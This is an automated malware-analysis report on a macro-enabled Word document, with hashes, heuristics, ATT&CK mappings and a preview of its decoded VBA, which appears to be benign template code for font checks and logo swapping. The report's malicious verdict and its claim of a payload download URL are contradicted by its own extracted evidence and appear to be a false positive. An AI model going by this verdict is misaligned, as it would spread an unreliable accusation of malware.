Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9976417cc49d90f1…

MALICIOUS

Office (OOXML)

Size: 3.69 MB | Created: 2021-09-07 11:33:00 UTC | Authoring application: Microsoft Office Word 16.0000 | First seen: 2021-09-27
MD5: 9b79a35c23724363164a499cdb43cb55
SHA-1: ee3a7d28ebd1c705555ea8bbb45e56f29a75b17d
SHA-256: 9976417cc49d90f15c00c06b6b9254b6388c73b35b8ab52e085ad1e0472c79f1
Risk Score: 536

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1071.001 Application Layer Protocol: Web Protocols
  • T1105 Ingress Tool Transfer

The sample contains VBA macros that are automatically executed upon opening the document, indicated by the 'Document_Open' macro and 'OLE_VBA_AUTOOPEN' heuristic. These macros utilize 'WScript.Shell' and 'URLDownloadToFile' to download and execute a payload from the URL 'http://www.npes.org/pdfx/ns/id/'. The VBA project part was also renamed to evade detection, suggesting malicious intent.

Heuristics (17)

  • VBA project inside OOXML [medium] OOXML_VBA (11 related findings)
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/vbaProjectSignatureV3.bin)
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Obfuscated VBA Shell command with URL [critical] OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • VBA project part renamed to evade filename detection [high] OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) [info] OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • VBA project carries a recognised code-signing signature [info] VBA_SIGNED_TRUSTED
    The VBA project is Authenticode-signed and the signer/issuer chain matches a recognised code-signing publisher or CA. Informational only — the signature is NOT yet verified to cover the current project bytes, so it does not (yet) reduce the verdict.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (8)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 41994 bytes
SHA-256: 964ba449822fafec52d983098ea24872eea577f452d45e9bd6e83033dcec70af
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim WithEvents appWord As Application
Attribute appWord.VB_VarHelpID = -1

Sub Document_New()
    Set appWord = Application
    
    '## check font
    Dim strFontName As String

    strFontName = "Frutiger LT Com 45 Light"
        If IsFontInstalled(strFontName) Then
            
        Else
            MsgBox strFontName & " ist  n i c h t  installiert! Das Dokument wird geschlossen. Bitte Schrift installieren!"
            
            Documents.Close
            Exit Sub
        End If

    Dim strFontName2 As String

    strFontName2 = "Frutiger LT Com 55 Roman"
        If IsFontInstalled(strFontName2) Then
            
        Else
            MsgBox strFontName2 & " ist  n i c h t  installiert! Das Dokument wird geschlossen. Bitte Schrift installieren!"
            
            Documents.Close
            Exit Sub
        End If
End Sub

Sub document_open()
    Set appWord = Application
End Sub

Private Sub appWord_DocumentBeforeSave(ByVal Doc As Document, SaveAsUI As Boolean, Cancel As Boolean)
    If (SaveAsUI) Then
        Cancel = True
        
        Set fd = Dialogs(wdDialogFileSaveAs)
        With fd
            .Format = wdFormatXMLDocument
            If .Show Then
                If (.Format = wdFormatXMLDocument) Then
                    ActiveDocument.SaveAs2 FileName:=.Name, _
                        FileFormat:=wdFormatXMLDocument, _
                        AddToRecentFiles:=True, _
                        SaveFormsData:=False, _
                        SaveAsAOCELetter:=False, _
                        CompatibilityMode:=14
                ElseIf (.Format = wdFormatXMLDocumentMacroEnabled) Then
                    ActiveDocument.SaveAs2 FileName:=.Name, _
                        FileFormat:=wdFormatXMLDocumentMacroEnabled, _
                        AddToRecentFiles:=True, _
                        SaveFormsData:=False, _
                        SaveAsAOCELetter:=False, _
                        CompatibilityMode:=14
                Else
                    ActiveDocument.SaveAs2 FileName:=.Name, FileFormat:=.Format
                End If
            End If
        End With
        Set fd = Nothing
        
        'Application.OnTime Now, "DocumentAfterSave"
    End If
End Sub

Sub DocumentAfterSave()
End Sub

Attribute VB_Name = "Logotausch"
Public checkLNG As Boolean

Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
    szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    
Function Stream_BinaryToString(Binary, CharSet)
  Const adTypeText = 2
  Const adTypeBinary = 1
  
  'Create Stream object
  Dim BinaryStream 'As New Stream
  Set BinaryStream = CreateObject("ADODB.Stream")
  
  'Specify stream type - we want To save text/string data.
  BinaryStream.Type = adTypeBinary
  
  'Open the stream And write text/string data To the object
  BinaryStream.Open
  BinaryStream.Write Binary
  
  
  'Change stream type To binary
  BinaryStream.Position = 0
  BinaryStream.Type = adTypeText
  
  'Specify charset For the source text (unicode) data.
  If Len(CharSet) > 0 Then
    BinaryStream.CharSet = CharSet
  Else
    BinaryStream.CharSet = "us-ascii"
  End If
  
  'Open the stream And get binary data from the object
  Stream_BinaryToString = BinaryStream.ReadText
End Function

Function Logo_einstellen(pfad, eps)
'    Selection.SetRange 0, 0
    ActiveDocument.ActiveWindow.View.SeekView = wdSeekCurrentPageHeader
        For Each sect In ActiveDocument.Sections
            For Each head In sect.Headers
                For Each shp In head.Shapes
'               
... (truncated)
ooxml_oleobject_00.bin | ooxml-ole-object | OOXML embedded OLE part: word/embeddings/oleObject1.bin | 2810880 bytes
SHA-256: 2d352e6a783f45f64b769301cfcc38adbf232711e1c9994f7d5a0ca52ae3855a
Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact entropy is 7.80, consistent with packed or encrypted content.
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 181248 bytes
SHA-256: bf529a607f5676ac3860192aea26cd6086efe12b2ac6e5b5cd76b6cc0ed34ede
vbaProject_01.bin | vba-project | OOXML VBA project: word/vbaProjectSignatureV3.bin | 8993 bytes
SHA-256: 41cf69568800122180cb12b6d637f99609e7c211e17a1e716e2f6ec708785fc8
vbaProject_02.bin | vba-project | OOXML VBA project: word/vbaProjectSignatureAgile.bin | 8993 bytes
SHA-256: 5415ae5dd66b9102555da8e8b491b49bbee3424affd4de4746b2b4764e2745b7
vbaProject_03.bin | vba-project | OOXML VBA project: word/vbaProjectSignature.bin | 8878 bytes
SHA-256: 421cf429da9c682b3643aa1e9333066bf3971b8e6bf03bfacff63cc64563c964
emf_00.emf | ooxml-emf | OOXML EMF part: word/media/image2.emf | 18516 bytes
SHA-256: 1c2deedc3575abff3f48432c0522c1a2d470b5085559e5b5a18ac3db12cfd69f
emf_01.emf | ooxml-emf | OOXML EMF part: word/media/image1.emf | 4784 bytes
SHA-256: a2a44070544c416819d2d65b99f9fb3891c55371f4c4f3ffce26e6ecb7d739d0